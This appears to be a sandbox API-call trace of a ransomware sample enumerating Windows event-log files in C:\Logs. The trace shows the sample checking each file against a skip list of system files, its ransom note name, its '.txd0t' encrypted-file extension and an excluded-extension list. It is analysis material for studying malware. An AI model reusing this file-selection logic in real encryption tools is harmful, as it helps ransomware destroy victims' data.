1 [0071.952] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="desktop.ini") returned 1 [0071.952] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="autorun.inf") returned 1 [0071.952] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="ntuser.dat") returned -1 [0071.952] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="ntldr") returned -1 [0071.952] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="ntdetect.com") returned -1 [0071.952] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="bootfont.bin") returned 1 [0071.952] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Connectivity.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.952] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Connectivity.evtx") returned=".evtx" [0071.952] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.952] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.952] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.952] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.952] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.953] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.953] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.953] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb151873, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb151873, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Operational.evtx", cAlternateFileName="MI4B6B~1.EVT")) returned 1 [0071.953] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2=".") returned 1 [0071.953] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="..") returned 1 [0071.953] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.953] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.953] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBServer%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-SMBServer%4Operational.evtx" [0071.953] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Operational.evtx") returned=".evtx" [0071.953] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.953] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.953] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.953] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.953] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.953] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2=" ransom ") returned 1 [0071.953] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="debug.txt") returned 1 [0071.953] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="boot.ini") returned 1 [0071.953] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.953] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.953] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.953] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="ntldr") returned -1 [0071.953] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.953] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.953] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.953] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Operational.evtx") returned=".evtx" [0071.953] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.953] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.953] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.953] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.953] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.953] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.953] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.953] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb177aca, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb177aca, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-SMBServer%4Security.evtx", cAlternateFileName="MI7709~1.EVT")) returned 1 [0071.954] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2=".") returned 1 [0071.954] StrCmpW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="..") returned 1 [0071.954] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.954] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.954] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-SMBServer%4Security.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned="C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" [0071.954] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Security.evtx") returned=".evtx" [0071.954] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.954] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="bootsect.bak") returned 1 [0071.954] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="iconcache.db") returned 1 [0071.954] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="thumbs.db") returned -1 [0071.954] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2=" ransomware ") returned 1 [0071.954] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2=" ransom ") returned 1 [0071.954] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="debug.txt") returned 1 [0071.954] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="boot.ini") returned 1 [0071.954] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="desktop.ini") returned 1 [0071.954] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="autorun.inf") returned 1 [0071.954] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="ntuser.dat") returned -1 [0071.954] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="ntldr") returned -1 [0071.954] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="ntdetect.com") returned -1 [0071.954] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="bootfont.bin") returned 1 [0071.954] StrCmpIW (psz1="Microsoft-Windows-SMBServer%4Security.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.954] PathFindExtensionW (pszPath="Microsoft-Windows-SMBServer%4Security.evtx") returned=".evtx" [0071.954] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.954] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.954] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.954] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.954] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.954] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.954] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.954] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd751ea61, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd751ea61, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Store%4Operational.evtx", cAlternateFileName="MICEDD~1.EVT")) returned 1 [0071.954] StrCmpW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2=".") returned 1 [0071.954] StrCmpW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="..") returned 1 [0071.954] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.955] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.955] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Store%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" [0071.955] PathFindExtensionW (pszPath="Microsoft-Windows-Store%4Operational.evtx") returned=".evtx" [0071.955] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.955] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.955] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.955] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.955] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.955] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2=" ransom ") returned 1 [0071.955] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="debug.txt") returned 1 [0071.955] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="boot.ini") returned 1 [0071.955] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.955] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.955] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.955] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="ntldr") returned -1 [0071.955] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.955] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.955] StrCmpIW (psz1="Microsoft-Windows-Store%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.955] PathFindExtensionW (pszPath="Microsoft-Windows-Store%4Operational.evtx") returned=".evtx" [0071.955] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.955] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.955] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.955] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.955] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.955] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.955] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.955] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd0763ff, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd0763ff, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", cAlternateFileName="MIE2F0~1.EVT")) returned 1 [0071.955] StrCmpW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2=".") returned 1 [0071.955] StrCmpW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="..") returned 1 [0071.955] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.955] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.955] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" [0071.956] PathFindExtensionW (pszPath="Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned=".evtx" [0071.956] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.956] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="bootsect.bak") returned 1 [0071.956] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="iconcache.db") returned 1 [0071.956] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="thumbs.db") returned -1 [0071.956] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2=" ransomware ") returned 1 [0071.956] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2=" ransom ") returned 1 [0071.956] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="debug.txt") returned 1 [0071.956] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="boot.ini") returned 1 [0071.956] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="desktop.ini") returned 1 [0071.956] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="autorun.inf") returned 1 [0071.956] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="ntuser.dat") returned -1 [0071.956] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="ntldr") returned -1 [0071.956] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="ntdetect.com") returned -1 [0071.956] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="bootfont.bin") returned 1 [0071.956] StrCmpIW (psz1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.956] PathFindExtensionW (pszPath="Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned=".evtx" [0071.956] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.956] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.956] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.956] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.956] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.956] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.956] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.956] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5089d037, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5089d037, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", cAlternateFileName="MIAB1D~1.EVT")) returned 1 [0071.956] StrCmpW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2=".") returned 1 [0071.956] StrCmpW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="..") returned 1 [0071.956] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.956] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.956] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" [0071.956] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned=".evtx" [0071.956] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.956] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="bootsect.bak") returned 1 [0071.957] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="iconcache.db") returned 1 [0071.957] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="thumbs.db") returned -1 [0071.957] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2=" ransomware ") returned 1 [0071.957] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2=" ransom ") returned 1 [0071.957] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="debug.txt") returned 1 [0071.957] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="boot.ini") returned 1 [0071.957] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="desktop.ini") returned 1 [0071.957] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="autorun.inf") returned 1 [0071.957] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="ntuser.dat") returned -1 [0071.957] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="ntldr") returned -1 [0071.957] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="ntdetect.com") returned -1 [0071.957] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="bootfont.bin") returned 1 [0071.957] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.957] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned=".evtx" [0071.957] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.957] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.957] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.957] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.957] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.957] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.957] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.957] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x508c32a6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x508c32a6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", cAlternateFileName="MI62D3~1.EVT")) returned 1 [0071.958] StrCmpW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2=".") returned 1 [0071.958] StrCmpW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="..") returned 1 [0071.958] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.958] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.958] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" [0071.958] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned=".evtx" [0071.958] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.958] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.958] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.958] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.958] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.958] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2=" ransom ") returned 1 [0071.958] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="debug.txt") returned 1 [0071.958] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="boot.ini") returned 1 [0071.958] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.958] StrCmpIW 